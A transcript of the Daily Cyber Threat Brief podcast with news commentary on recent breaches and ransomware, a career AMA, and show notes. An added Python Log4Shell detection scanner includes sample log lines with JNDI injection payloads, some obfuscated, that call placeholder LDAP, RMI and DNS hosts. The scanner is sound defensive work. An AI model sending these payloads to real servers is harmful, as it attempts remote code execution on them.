All right, GitHub, creds, SQL scripts, table definitions. Okay, so like some sensitive, sensitive infrastructure stuff. It doesn't look like they got like the. The recipe for, you know, insert AstraZeneca pharmaceutical drug here. So we'll see. This doesn't look like it was a. This doesn't look like it impacted AstraZeneca's operational performance. They're still making drugs, I guess, is what I'm saying. So I. I don't think that they'll pay. The story. Let's see, let me see. Is there a dollar sign in here? Nope. All right, so there's no amount that they're being asked. Is the word initial in here? Nope. So this story is super high level. Like, it doesn't explain how they got hacked, it doesn't explain what the ransom is. It doesn't explain anything. It just says that a big pharma got hit with a. With a hack. This story, it. If this story. If this story turns sideways, it'll disappear. That's how thin and not useful this is. I will say, if you do work in pharmaceutical, this would be a great one to grab. I have a good friend who works in pharma, and his organization isn't super cyber forward as far as, like, taking cyber security seriously. So this is a great one and just a reminder to everybody. There's stories every single day of hacks and attacks. And, you know, you can pick and choose any one you want to help your agenda and help sell or not sell, but help properly convey and communicate the importance and value that cyber security brings to an organization. But when there's one that's directly in your industry, absolutely grab that with both hands and don't let go. So if you work in pharma, the CEO, the CFO, the head of research at the pharmaceutical company, they know who AstraZeneca is, okay? So you could be like, look, dude, AstraZeneca got hit. Like, they're targeting pharmaceuticals. It'll just hit a little bit more personal, right? It's like saying, like, there was an armed robbery at gunpoint in. In. In Toledo, Ohio, yesterday, right? 
You're like, okay, whatever, like, big deal. Now if I said there was an armed robbery at gunpoint resulting in grand theft auto, out, like on the street, outside your house, it's like, oh, that feels a bit more visceral. That feels a bit more personal, and it will stick a little bit better. So I'm not saying use fear, uncertainty, and doubt in order to, like, scare your CFO into giving you money, but use the stories that are more related to your business in order to get, you know, better traction, etc. Trust me.
B
Campus warns of a breach. If your kids don't already have some free credit monitoring, you're in luck. The popular K-12 EdTech company Infinite Campus began warning customers that it suffered a data breach. The extortion group ShinyHunters claims credit for the breach. Infinite Campus says the data was accessed through an employee's Salesforce account, a pretty familiar tactic for ShinyHunters. The group gave the company until today to pay a ransom or leak out personally identifiable information and internal corporate data. Infinite Campus manages data on 11 million students across over 3,200 school districts in 46 states. Infinite Campus maintains that no customer databases were accessed in the attack. Russian access.
A
All right, I mean, again, I don't research or prep for these shows, so I didn't know this was going to happen. But like, literally ShinyHunters is part of that triumvirate. To use a, to use a vocabulary word that I picked up in like 10th grade: Lapsus$. And then ShinyHunters, like, these guys are very active, not necessarily getting paid, but like, they share techniques, they share tooling, and they, they're like, like a gang, basically. If you've seen the original Teenage Mutant Ninja Turtles movie from like 1991 or whatever, like Shredder had like a, a warehouse hangout for like, you know, basically Lost Boys essentially. That's, that's like what ShinyHunters is like. They have like, you know, like a, like a hangout. It's virtual, but. And they commit crime instead of. Well, I guess Shredder's, like, miscreants also committed crime, but yeah, K through 12 system got breached. How did they get in there? The hackers accessed an employee's Salesforce account, exposing the information. All right, Salesforce is like the big dog in the room around customer resource management. Lots of organizations use Salesforce for their sales pipeline. This right here hacked. Accessed an employee's Salesforce account. So the exposure of information is pretty limited. It's like what one, one employee could get. Number two, I don't think this is student accounts. Like, you know, the reporter jokingly said, oh, if your kid doesn't have identity theft protection, you know, you're in luck. They're going to. Infinite Campus, as far as I know, is not selling to children, they're not messaging children, they're selling to adults, they're selling to businesses. So, you know, I don't think, I don't think my son's gonna get identity theft protection from this. Second of all, one person. 
So either Infinite Campus doesn't use multi factor authentication, which would absolutely be egregious, or threat actors were able to steal session tokens or do some type of multi factor authentication, adversary in the middle attack, whatever it was. This is a breakdown in, in, you know, identity and authentication, but it, it is limited. They were able to figure it out. I, I don't think that this company will pay the ransom, frankly. Operationally, they're not impacted. It was like one form of ransomware where they exfil data and they're ransoming the data back to the victim organization. Infinite Campus, they have till March 25, which is today. Yeah. So Cyber Shin and Gummy says Infinite Campus and PowerSchool, all the kids' data is screwed. I agree. The thing is. And if you guys don't remember or you're new, right? PowerSchool got hacked last year and yeah, PowerSchool got hacked last year and PowerSchool is in like 85% of United States K through 12 schools. As like a back end for like report cards and all that stuff. That information was the kids' information. Like PowerSchool got hosed completely. Pants, pants, like pants down in a large crowd. This Infinite Campus one, it. It definitely seems like. It's not that. It seems like it's more like, you know, sales data around potential customers. You can see here Infinite Campus is not going to engage the attacker. Why would they? Like, it's very little like liability for Infinite Campus, it would seem. And all they had to do was like, reset the user account's password, right? And, and, and revoke any current sessions. Like, this is. Dude, if today was your first day in incident response, this would be like a great one. Okay. Even if you did go to Memphis, you could reset the creds on this one and not have like PTSD from it. All right, let's keep cooking.
B
Sentenced to 81 months. Back in November 2025, Alexei Volkov, aka Chewbacca Corps, pleaded guilty to six federal charges as part of his work in the Yanluowang ransomware group. Volkov served as an initial access broker for the group, facilitating dozens of attacks, resulting in over $9 million of combined losses. The case provided a very clear picture on how initial access brokers work within ransomware organizations, how they're compensated, and the breadth of Yanluowang's activities. A judge now sentenced him to 81 months in federal prison. Volkov must also pay full restitution to victims and turn over all equipment used in criminal activities.
A
All right, Chewbacca. Hilarious. Hilarious, dude. Someone told me a story last night at this dinner I went to. I can't remember who it was. I think it was Jason Haddix, but I'm not entirely sure because, remember I showed you guys the pay phone at the mid roll for the Way Back Wednesday stuff. We were talking about phones or whatever. Jason said a story where like some guy had a phone and like voicemail or whatever, and all the employees were told to call and like, do their best Wookiee impression. So this guy would regularly wake up in the morning and he'd have like 30 voicemails and he would have to check them because, like, you don't know which ones are legit and which ones are not. And it would just be like, like, it's just a bunch of people doing like, Wookiee sound effects. Every voicemail. Hilarious. Such a good prank to pull on people. All right, so this guy, do we have. I do not have the. Regulators mount up. But let's go ahead and do that. Right. Regulators mount up. If you got, if you're a squad member, go ahead and get into that. Chief Wiggum, justice is served. It's delicious. This guy right here is going to jail for 81 months, which if I'm doing some quick back of the napkin math, what is that, like almost seven years? I don't know where he's going to jail. Like, obviously he was arrested in Rome and extradited to the U.S., so he's going to be in a U.S. prison system, which is, you know, fine, whatever. I, I don't want to go to prison in any country. But like, you know, I've heard stories about Russian prisons being really bad, so at least he doesn't have to do that. This guy was basically. This guy ruined people's lives. Okay? Two victims paid one and a half million dollars combined. So this isn't like, you know, a couple bucks or like, you know, shaking you down for some lunch money. This is like life altering or business altering money. I don't. This guy. Yeah, good. More of this should happen. This is more, just cyber industry related, less cyber. 
Like you're not going to do anything with this information. So this particular guy, this ransomware gang would actually call the victims and harass them as well as do denial of service attacks. So just really quickly, when we talk about ransomware attacks, there's like three forms of ransomware. One is encrypting your data, which is the traditional one. Two is data exfil and selling it back to you. And then three is doing a denial of service attack. And like you pay the ransom to have this, the denial of service attack, stop. You don't see the denial of service one happen very often. And threat actors are doing a lot more just data exfil without the encryption. But you can do all three. You can just do one of them. But this guy, this guy, you know, has to pay restitution. We'll see. You can see here, he must pay full restitution, including $9.1 million to identified companies and forfeit equipment used in the activities. I mean, forfeit equipment. I'm sure law enforcement confiscated all of it. I don't know, I don't know how jurisdiction works, right? Like if I live in Russia and I commit a bunch of crimes, but then I vacation to Rome and get arrested and put in a US jail. Like you're gonna go to Russia and take my equipment or, like, when he gets out of jail. Like, how do they. You can't, like, hold them against their will, can you? I don't know how it works. Anyways, this is a win for the good guys. I don't think this is going to curb any behavior. I don't think ShinyHunters or Lapsus$ is going to slow down, but. But, you know, let the system work. Let the. Let justice serve. Okay, let's do this. Let me. I gotta turn the volume down before I blow your ears out. Let's do this, then. Let's do this. A lot of manual today, guys. Here we go. All right, y'all, that's gonna do it. For today's news, it is top of the hour. I will be doing a. I gotta get a haircut, guys. Look at this. I look like a sea anemone. 
That's like, you know, a boat just drove over the water and churned it all up. I look like a lunatic. This was the Daily Cyber Threat Brief. I was coming to you live from, I don't know, Flatbush or something. San Francisco, RSA. It's dark out. Coming to you from the cave. I'll be back in the Buffer Ozier Flow studio tomorrow. If today was your first day, Mr. Buddha, I hope you had a great experience. If this was your first week, come back tomorrow. Come back tomorrow because we'll actually be in the studio with all the fancy equipment and whatnot. It's all about good times. I'll be at the airport in a few hours and just be traveling all day. Don't go anywhere, though, because we are going to do some Jawjack. And I'm gonna do some AMA for a hot minute and get after it. First question. Hold on. Let me do the Jawjacking segue and we'll get into that. All right, don't go anywhere. I'll handle this. And then I'll answer Marcus Kyler's question. Ever wonder what it takes to break into cyber security? Join us every weekday for Jawjacking, where industry experts answer your burning questions about the cyber security field live, unfiltered, and totally free. 3. Let's level up together. It's time for some Jawjacking. All right, what's up, everybody? Welcome to the party. Let me. I gotta do the Jawjacking. Is this Jawjack? No, that's not good. Jawjacking. Oh, my God. You know what? I'm just gonna do this one. Welcome to Jawjacking. I will answer any and all questions you have if they're asked politely. And by politely, I mean just ask the question. Don't be like, hey, a-hole. Answer my question. First question was Marcus Kyler saying, say what? My hair. See how, like the, the top of it here, when it gets really long, it looks like a sea anemone? Am I saying that wrong? Sea anemone. Hold on. This is what I'm talking about. See an enemy. Look at this. See an enemy, right? Look at my hair. No, I. Oh, hold on. Yeah, look at that. See what I mean? That's the first. 
No, hold on, lady, trying to do a bit here. See that? Look at the top of my hair. Then look at that all day, every day. That's what's going on. All right. If you have any questions, put them in chat. I do want to answer them to the best of my ability. We're just having a little bit of fun with the sea anemone. But I, I do want to answer your questions and get them on stream. That's the point of Jawjacking. It's not to hear me flip out about it. It looks like bedhead. Thank you, Zach Hill. How's. How's RSA? RSA is good, man. You know, I got asked, I was interviewed for something and they asked me, like, what's the buzz at RSA? Like, yeah, listen, RSA is cool. I like it better this year than I did last year. Agentic AI is kind of like the big thing everywhere. AI, AI. But what I will say is I'm pleasantly surprised that there is a very thick undercurrent of like managing AI and like getting control on AI. Not necessarily controlling like the explosive growth of it and everything, but like, basically everyone is kind of agreed that like we're going to be rolling out AI on all the things. But like, how do you manage that? How do you get visibility? How do you inventory it? How do you control what is appropriate and what is not appropriate for end users? How do you. Do you control outputs of AI? How do you control non human identities doing things that they're permitted to do, but they're doing it with malicious intent? Right? So that, to me, that's like a sneaky main pillar of RSA or at least the. The meta of RSA this year. Did you hear about the power grid hit in Valley City, North Dakota? Reaper Doe says no, and I told Reaper Doe that I would answer their question. So I'm assuming this is it. Power grid, Valley City, North Dakota. Also, Reaper Doe, it looks like your Caps Lock is on. If you're trying to log into something and the password's not working, chances are that's why. Let's take a look at this really quickly on North Dakota power outage. Everything looks good. 
The, the map is reading clear. So I don't know where Valley City, North Dakota is, but it doesn't look bad right now. Also, with all due respect, Reaper Doe, I don't actually see any news stories around power outages for Valley City, North Dakota. Is this it? Oh, I mean there's scheduled maintenance on West 25th Street, but yeah, I don't know anything about this story and it looks like the Internet does not. It's not covering it yet. So maybe it's just breaking news. Continuing to look, if you have a question, put it in chat with a Q. Code Brew asks, with OpenAI shutting down their video generation app, do you think this is the start of streamlining, an attempt to make AI profitable, or a sign that the cracks are starting to show? So I had a conversation with Elliot Matice on Monday night and Elliot Tice is a squad member or he's a Simply Cyber community member, but he's like got big vision on like geopolitics and stuff. Couple things. One, OpenAI is not profitable, right? They have like a hundred billion dollar valuation and they are getting all sorts of investment but like I don't think they're profitable right now, which is fine. Right? Like all sorts of tech startups burn money and don't report profit for quite a while. But the video generation part of it, I, I didn't know that they did that, is that Sora is OpenAI's video generation, Sora. The only thing I can think of is if they're shutting it down, it's either A, maybe they're going to sell the technology, B, they need to allocate resources to other parts of the business. Maybe you know how they just signed with the Department of Defense to like basically make. They didn't say this, so I don't know definitively, but it seems like killer AI, like basically T-1000s. Maybe they need to allocate resources to that part of the business because that will be big pro, big contracts and big money. I do, I do want to say as far as Elliot Matice goes, these companies are all the whole. 
There's a big talk about AI bubble crashing and oddly I didn't know about this but like the, the stuff going on in Iran has to do with petroleum, you know, the flow of oil and petroleum being impacted and there's something called petrodollars that, that gets invested into the US stock market. And like, you know, those are going to be problematic since there's like a, a chokehold being put on the oil and gas industry, for lack of a better term. So I honestly, I think Code. Code Brew. I think it's just a business decision to manage spend and allocate resources to other parts. I wouldn't say it's like them hemorrhaging and it's a, a sign of cracks. Rich464 says the supply chain attack for LiteLLM via PyPI is wild. The team responsible is saying they're going to continue to attack systems like this going forward. How do you protect and inform your team? Hold on, I don't know this one. LiteLLM. PyPI. Shoot. Hold on one second. Give me, give me one second. My wife just called me. Oh no, never mind. What's that? What's today? Okay, I'm sorry guys. I. When my wife calls, it's like it's a priority. All right, so I'm looking at this story right here. All right? Oh, Wiz covered it. Three is a Crowd. TeamPCP trojanizes LiteLLM in continuation of campaign. TeamPCP is attacking open source projects. Okay, so here's the deal. Correct me if I'm wrong, Rich464, but the problem is threat actors are attacking open source code repositories and introducing malware into them. Okay? Anytime you use open source, you got to be mindful of that. The question was, how do you protect and inform your team? Well, okay, so inform your team. That's easy, right? Hey guys, listen. Here's multiple examples of GitHub repositories being compromised. Fact. Okay, so be mindful. Sometimes you don't even know that you're using a product that has a GitHub project inside of it, right? Like we saw this with Log4j years ago, like 2021. 
All sorts of systems had Log4j, but it was like, you know, supply chain where it was baked in and then a product was baked in and then the product was baked in. So it was like six degrees of separation. So we didn't even know that you had it. So you can't absolutely minimize this risk to zero. But number one, be mindful of where you're getting your code from. Number two, you should absolutely have, you should absolutely have detections in place. If you're relying on protection controls exclusively, which I'm not going to hate on you like that. That, that is like pretty common, right? If you look at any information security program that's like, immature or, you know, just kind of burgeoning, the Identify and Protect controls in the NIST CSF are going to be much higher as far as implementation. The maturity level of your Identify and Protect is going to be higher than your Detect, Respond and Recover. But for this, like, obviously, you know, if malware detonates in your environment, there's going to be weird services, there's going to be C2 traffic, there's going to be data exfil, potentially there's going to be signatures of compromise or indicators of compromise. So having those detections in place at least can identify that. You know, basically the dwell time or the mean time to detection can be reduced pretty quickly. So you can intervene and hopefully reduce the impact of an exploit. So let's go. I'm gonna do 15 more minutes. Let's go. Here. AI, AI, AI. All right, I'm looking at chat right now. Someone just said Cuba. How do you power AI and provide enough fresh water? I don't know. I guess. Is that. Is that a problem? Like, is there an AI fresh water issue? I don't know that one. Please. Justin Gold. I feel like if. If there is some type of, like, thing around that, Justin Gold's got the tea on it. Is UAV security pretty much the same as cloud security? Is that a joke, Kyle? I mean, that's. That is funny, right? 
So I'm assuming he means unmanned air vehicle, like a drone. And since drones fly, they're in the clouds. So I. This is funny. That's a good joke. Okay, so Code Brew says it's. They're shutting Sora down. They're. Dude, they're either selling it or it's just like they're reallocating resources. Trini Jefe. Might be a silly question. If it is, it's fine. Like, every question is welcome here if it's asked with good intent. Having an alias as my username instead of my real name, cause any hiccups or obstacles if I'm audited for my CPEs, like, using my comments as proof of being here? No, I mean, I feel like if in. Okay, so, like, if I put my auditor hat on and I'm like, hey, listen, I need you to prove that you have these CPEs, and you send me a bunch of screenshots and every single one says Trini Jefe, I'm gonna be like, okay. Like, okay, like, here's the evidence. And then if I wanted to say, wait a minute, who's Trini Jefe? You could, like, you could easily be like, I can show you, like, one, here. Here's like a screenshot of me having access to the user account. Or two, you could even just comment in chat and say, like, this is evidence for auditor Jerry Oer, who asked me on March 25th to prove that I am the person I said I am. And then take a screenshot of that and be like, clearly, I'm the one who wrote that and no one else. Like, it's so unique a piece of evidence to demonstrate. Like, that's a silly way to get to the result, but as an auditor, that would be fine for me. Okay. Yeah, a lot of people are talking here that, like, Disney backed out of the deal. That's fine. Silence Poet says, my manager is being promoted soon. I've been in this risk analyst position for six months, but my director thinks I can move up. Is it too soon? No, no, man. No. I mean, do you want to be a manager? I mean, that's the question. I mean, if you're a smaller organization, Silence Poet, you're probably still going to be hands on keyboard. 
But if you're at a larger organization and you become a manager, you're managing people now, not managing risk or tech. So, I mean, does it align with your career? That's what I would say. Don't, don't. I mean, if you don't feel ready for it, but your leadership thinks you are, you know, you could tell them, like, hey, like, this would be. This would make me uncomfortable, but I want to do it. And like, you know, what kind of training can I get in order to, like, level up and be the best manager possible? You know what I mean? Like, kind of like, set yourself up for success. Normally it's the other way around where you want the promotion and you're, like, trying to convince management, so they obviously see something in you also. Silence Poet, let me know if you still want to do the poker tournament. Remember, it's Simply CyberCon. Any activity that people want, we can. I can help you get set up, but any activity has to have someone own it. That's not me. Except for the Magic: The Gathering tournament, I'm going to own that. How's your thumb doing? It's pretty much healed. Although you can see. I don't know if you'll be able to see, but whatever, it's, it's healed. Thanks for asking. B. Nash, have you hit that, like, button yet? Kimberly can fix it. You're the best, Kimberly. All right. Continuing to cruise through questions. Shout out to Wading Through Logs, Wade Wells. Good to see him back. Congratulations to him for all his personal success. Why is perfectionism detrimental to growth in the industry? I don't, I mean, I don't know if it's detrimental, but I, I would say, I, I guess I would just say this. There's so much to do, there's so much to learn. No one's going to be an expert of anything because there's just too much and it changes so quickly. So if you strive for perfection, you're probably going to not be, you're not going to be moving very quickly because, like, the first 80% you can get. The first 80% you can get for 20% of the time. 
The last 20% would take 80% of the time. So you're actually like doing yourself a disservice by, you know, not getting a broader knowledge and taking advantage of other opportunities. So I could say that might be why perfectionism could hinder you. Yeah. Oh, okay. Again, I guess, like, like, I don't prep or research the stories. I'm reading the question and answering and then I scroll chat. So I see chat, like TJ and Justin and others, sharing their thoughts on that question. So thanks, guys. And by the way, I love that the squad, the Simply Cyber Community Team SC. I love that you guys share your thoughts and mentorship in the chat as well. I got to see Phil Stafford yesterday. Shout out to Phil Stafford's wife and, you know, and, and Phil's calves. Like, there was a whole thing with Phil's calves yesterday. And Phil, Phil said that his is. He was, him and his wife were talking. She said that he does have nice calves. So I was saying it as a joke, but spoiler, joke's on me. Phil's calves are quite nice. How are the TSA lines going into RSA? Dude, Michael, I flew out of Charleston. I had like literally a 30 second TSA experience. San Francisco has a privatized TSA and the word on the street is like, you just walk right through. It's no big deal. Now ICE has been deployed in a bunch of places since I got here, so I don't know, I'm gonna get to the airport like five hours early because I'm not one of these guys who's like, oh, I've got a two hour layover. I'll just take an Uber and go do San Francisco for a minute. Go to Fisherman's Wharf and then go back to the airport. No, my, my butt goes to the airport and sits at the gate. I've got work to do. I've got audiobooks to listen to. I'm exhausted. I've been working all day, networking all night and then getting up at 3:30 in the morning to call my son to, to wish him a, a good day at school and then get prepped for the show. Right? So I. This, this. Do you see what I look like? 
This is not, this isn't manufactured. I look like, I look like I was, I look like a catcher's mitt right now. I look like a. Just an old beat-in catcher's mitt. Ugh. Like I'm, I'm sorry for you guys, like that. You have to look at my face. I'm, I'm like. In your opinion, who should the CISO report to? Very good question. I think in smaller organizations the CISO should report to the CIO. I think in larger organizations the CISO should report to legal, general counsel. There's a case to be made for the CISO to report to the CFO. But in smaller organizations it's kind of hard to get like a separate budget. So like if you go through the CIO, there's absolutely going to be budget. If you have a good relationship with the CIO at larger organizations, they have more budget and lots more going on. So you could actually get like, by not reporting to the CIO, you kind of avoid conflicts of interest. And by the way, if anyone is like curious, like what, what kind of conflict of interest? I'll just give you a quick example. A CIO, chief information officer at a business, is typically responsible, they're responsible for applications, information security, data and infrastructure like servers and endpoints and stuff, right? So that's the CIO's world. The CIO is responsible for making sure that work can get done, business can get done. So if there is a problem, right? And the choices are we need to take this off the network because it's a bad thing. That's cyber security's deal. And the CIO says no, we're going to leave it up because it's mission critical and we need to keep making money, packets need to keep flowing. You figure it out, that five nines, that performance. If the CISO reports to the CIO, the CIO gets the final say. So that's an example of where that conflict could come up. All right, Roswell UK signing up for the MetaCTF. I love the MetaCTF people, by the way. Tech Runs telling Silence Poet to take that promotion, to do it, in the words of Emperor Palpatine. It's a bank. 
I eventually want to go off on my own. Yeah, no, I think I would do it then, definitely get that leadership experience. And if you can keep your technical chops good as well. Michael Fink saying Stax and Mill Commander at Simply CyberCon. Yeah, I mean, I. This is not going to resonate with many people in the chat, so I'll just say it quite quickly. I. I'm proposing a Rule 0. One match or one, one segment of the conference for like anything goes decks. And then we can have like Rule 0 of like bracket two, bracket three only. All right. Today's the Blue Team Summit. Yeah, today. Today is Antisyphon SOC Summit, starts at 10am, 30 minutes from now. Continuing to scroll chat. Team SC in space. Who's going to the SOC Summit today? Drop it in chat. Drop it in chat. Who's going to the SOC Summit? William Bailey. He's got first world problems that I know nothing about. Apparently the AMEX Platinum lounge is being selective, that you can only go in there 90 minutes before takeoff. I. I don't know. And by the way, I'm. I'm being like playful. William Bailey. I'm being playful. Trust me, if I had an AMEX and access to the Platinum Lounge, you can bet that's where you'd find me. You catch me outside. How about that? All right. And I think I could go to the Delta Lounge. I don't know. I've never done those things, so. I don't even know about that. Christopher Reyes. This is a great example where I don't know what you're talking about. So what happened? I need more context. I'm happy to answer any questions, but I just need context. A lot of people traveling early. CISO should report to CEO. Marcus Kyler of the Yeet Crew says, do I have Yeet on here? No. Getting to the airport is so hot right now.
B
That Hansel's so hot right now.
A
I was looking for an excuse to play that. Okay. A lot of people having opinions on how the CISO should report. Very cool. I could see the CISO reporting to the CEO as well. Definitely a good option. Oh. Two Cyber Chicks is at 9:30am today. Thank you, Kimberly can fix it. Let's go ahead and do that. I was going to go to 9:30 anyway. So this is a perfect. This is perfect. Two Cyber Chicks, love. Love what they're doing. Here we go. Let me do this. Let me do this. Let me do this. Let me. No, let me do this. Let me do this. Let me do this. Let me do this. Wink. So. Season 8 Episode 3, Two Cyber Chicks, we can raid it. Bruh. There you go. Oh, yeah. I fly Delta. All right, Zach Hill is going to the airport to pick his mom up. Love it. Ross the Boss knows about the AMEX Platinum Lounge. Loving it. I don't have an AMEX. I have a Chase card. All right, so I am caught up on chat. Hey, I want to say what's up. I know she didn't say hi to me, but Shimeri Gonzalez. What's up? Big fan of hers. She's good people. All right, we're caught up in chat. If you have a question, drop it in chat. I'll answer it. Otherwise, we're gonna raid Two Cyber Chicks in just a minute. Shout out to all y'all. Thank you so much for bearing with me the last couple days. We had a lot of technical difficulties, but we worked through it. I show up, guys. I show up. I'm so proud. It's such an honor to be able to serve this community in this capacity. So thank you for that. I appreciate it. All right, guys, 57 seconds till go. Live, Two Cyber Chicks, Erica McDuffie, Jack Scott, talking about the business winning, the hard truth about being a CSO. So if you want to be a CSO and you want to hear straight facts, come on down. Check this out. Two Cyber Chicks right now. I'm Jerry from Simply Cyber. This has been the Daily Cyber Threat Brief. I'll see you guys tomorrow. If you. If you need me in the next. If you need me until tomorrow, come find me. I'll be passed out in an airport. Until next time, stay secure. See.
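The Log4j point in the transcript above, that you may never trace every product the vulnerable library was baked into, but you can still catch the exploit attempt in telemetry you already collect, as an added example that is not part of the episode and not code from Simply Cyber or any vendor product: a small Python scanner that flags Log4Shell-style JNDI lookups in web server access logs, including the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) attackers used to slip past a plain grep for `jndi`. The regular expressions are the example's own, the log lines are constructed, and the 198.51.100.7 and c.example.net callback targets are placeholders, not real indicators.

```python
"""Flag Log4Shell-style JNDI lookups in log lines.

Added example for these show notes; not code from the episode, from Simply
Cyber, or from any vendor product.  The sample log lines are constructed.
"""
import re
from typing import Iterable, List, Optional

# Innermost obfuscation lookups that evaluate to a plain string, used to hide
# the literal "jndi" from naive greps.  Forms covered: ${lower:j}, ${upper:N},
# ${::-j}, ${env:NOPE:-j}, ${sys:nope:-n}, and any nesting of those.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${x:-val} -> val

# What is left once the obfuscation is stripped: ${jndi:<proto>://<target>...}
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*/*([^/}\s]+)",
    re.IGNORECASE,
)


def _resolve_case(m: "re.Match") -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(line: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes.

    Bounded by max_rounds so a pathological line cannot spin the loop.
    The result is lower-cased so later matching is case-insensitive.
    """
    s = line
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(_resolve_case, s)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == s:
            break
        s = new
    return s.lower()


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it looks clean."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {
        "protocol": m.group(1).lower(),
        "target": m.group(2),            # host[:port] the victim would call back to
        "obfuscated": norm != line.lower(),
        "normalized": norm,
    }


def scan(lines: Iterable[str]) -> List[dict]:
    """Scan an iterable of log lines; reported line numbers are 1-based."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = scan_line(line)
        if f:
            f["line"] = n
            findings.append(f)
    return findings


# Constructed access-log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] '
    '"GET /?x=${${lower:j}${upper:n}di:${::-r}mi://198.51.100.7:1099/x} HTTP/1.1" 400 0',
    '10.0.0.12 - - [10/Dec/2021:03:15:00 +0000] '
    '"GET /?q=${${env:NOPE:-j}ndi:dns://c.example.net/t} HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: jndi {f['protocol']} -> {f['target']}"
              f"{' (obfuscated)' if f['obfuscated'] else ''}")
```

This is a content-layer check only: it tells you someone threw the payload at you, not whether a vulnerable Log4j instance actually resolved it. The callback target it extracts is exactly what to pivot on in egress logs, which is where the C2 traffic and exfil the host mentions would show up, and a hit from a host that has no reason to speak LDAP or RMI outbound is the confirmation that matters.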
Host: Dr. Gerald Auger
Podcast: Daily Cyber Threat Brief by Simply Cyber Media Group
Theme of Episode:
A speed-run breakdown of the top 8 cybersecurity news stories for March 25, 2026. The host delivers practical, sometimes opinionated analysis with career tips and an emphasis on the real-world impact of each story. Community engagement, both through live chat and shared anecdotes, infuses a sense of camaraderie, technical know-how, and a few laughs.
Dr. Gerald Auger, broadcasting live from San Francisco, delivers a swift yet insightful rundown of the day's most relevant cyber news. The episode balances practical security implications for cyber professionals with real-time reactions, career guidance, and interactive community engagement. Notable for both its expert breakdowns and engaging asides, the episode covers topics including the FCC’s ban on foreign routers, kinetic attacks on cloud infrastructure, major breaches at Crunchyroll and AstraZeneca, the ongoing challenge of supply-chain attacks, and more.
“There are so many people in our industry who do hardware hacking...you can dump the firmware and see if there is baked in malware or malicious intent.”
[13:52]
"This is the most ham-fisted, blunt policymaking I’ve seen in a while...This is puppycock. Complete hogwash."
[16:44]
"This is at the physical layer. When you launch a kinetic explosive into a data center, it impacts the physical layer."
[19:26]
"Don't sleep on the physical environmental controls, okay? They are real controls. Shout out to NIST. I do love myself some NIST-firm."
[23:37]
“You want to solve this gap and close it over tacos on a Tuesday in April—not when you’re getting punched in the mouth by Akira ransomware...”
[28:12]
“I don’t know if we need the Department of Emerging Threats...That is the capability of the staff of DoD or the NSA.”
[31:20]
“These cyberattacks can scale at such a level – it exposes insurance companies to a lot of financial risk. I think the [private] insurance industry will be OK…”
[44:18]
"When there’s one that’s directly in your industry, absolutely grab that with both hands and don’t let go…"
[50:37]
“If today was your first day in incident response, this would be a great one…it’s like, reset the creds and you won’t have PTSD from it.”
[56:28]
“More of this should happen. Let justice serve!”
[59:05]
“This will never be on a Security+ exam…but just know, attacking phones was called phreaking, P H R E A K I N G.”
[37:45]
Jawjacking/AMA:
Episode 1096 brings a unique blend of skeptical industry analysis, technical guidance, and career mentorship. Dr. Auger’s hot takes on government policy and security practices are balanced by actionable advice—especially on risk assessment, incident readiness, and community engagement. The episode stands out for its real-time reactions, sector-specific tips, and the welcoming, supportive tone that is a hallmark of the Simply Cyber community.
Ideal for: Security professionals wanting quick, thoughtful takes on news, actionable career tips, and lively cybersecurity community vibes.